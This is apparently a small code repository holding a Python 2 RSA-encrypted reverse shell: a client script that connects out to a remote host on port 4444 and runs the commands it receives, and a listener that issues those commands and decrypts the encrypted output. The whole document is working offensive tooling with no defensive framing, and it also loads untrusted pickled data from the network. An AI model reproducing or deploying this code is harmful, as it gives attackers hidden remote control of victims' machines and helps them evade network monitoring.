├── README.md
├── reverse_shell_rsa.py
└── listener_rsa.py


/README.md:
--------------------------------------------------------------------------------
1 | # RSA-reverse-shell
2 | Python implementation of RSA reverse shell.
3 | 


--------------------------------------------------------------------------------
/reverse_shell_rsa.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import socket, subprocess, sys
 4 | from Crypto.PublicKey import RSA
 5 | from Crypto.Hash import SHA256
 6 | import pickle
 7 | 
 8 | 
 9 | RHOST = sys.argv[1]
10 | RPORT = 4444
11 | 
12 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
13 | s.connect((RHOST, RPORT))
14 | 
15 | def receive_key():
16 |     data_key = s.recv(1024)
17 |     return data_key
18 | 
19 | pickled_publickey = receive_key()
20 | public_key = pickle.loads(pickled_publickey)
21 | 
22 | 
23 | while True :
24 |     command = s.recv(1024)
25 |     if command == 'quit' :
26 |         break
27 |     reply = subprocess.Popen(str(command), shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
28 |     stdout, stderr = reply.communicate()
29 |     en_reply = public_key.encrypt(stdout, 32)
30 |     s.send(pickle.dumps(en_reply))
31 | 
32 | s.close()
33 | 
34 |     
35 |     
36 |     
37 |     
38 | 


--------------------------------------------------------------------------------
/listener_rsa.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | from Crypto.PublicKey import RSA
 4 | from Crypto import Random
 5 | from Crypto.Hash import SHA256
 6 | import socket
 7 | from thread import *
 8 | import sys
 9 | import pickle
10 | 
11 | 
12 | random_generator = Random.new().read
13 | key = RSA.generate(2048, random_generator)
14 | public_key = key.publickey()
15 | 
16 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
17 | try:
18 |     s.bind(("0.0.0.0", 4444))
19 | except socket.error, v:
20 |     print "Binding failed. Error code : " + str(v[0]) + " Message " + v[1]
21 |     sys.exit()
22 | 
23 | 
24 | print "Socket bind complete"
25 | 
26 | s.listen(2)
27 | print "[+] Listening to the incoming connection on port 4444..."
28 | 
29 | def clientthread_sendpublickey(client) :
30 |     client.send(pickle.dumps(public_key))
31 | 
32 | def clienthandle(client) :
33 |     while True :
34 |         command = raw_input('~$ ')
35 |         client.send(command)
36 |         if command == 'quit' :
37 |             break
38 |         buf = client.recv(2048)
39 |         encreply = pickle.loads(buf)
40 |         print key.decrypt(encreply)
41 | 
42 | while True:
43 |     (client, (ip, port)) = s.accept()
44 |     print "Received connection from : ", ip
45 |     start_new_thread(clientthread_sendpublickey, (client,))
46 |     print "Public Key sent to", ip
47 |     start_new_thread(clienthandle, (client,))
48 |     
49 |     
50 | 
51 |     
52 | 
53 |     
54 |     
55 |     
56 |     
57 | 
58 | 
59 | 
60 | 
61 | 
62 | 
63 | 


--------------------------------------------------------------------------------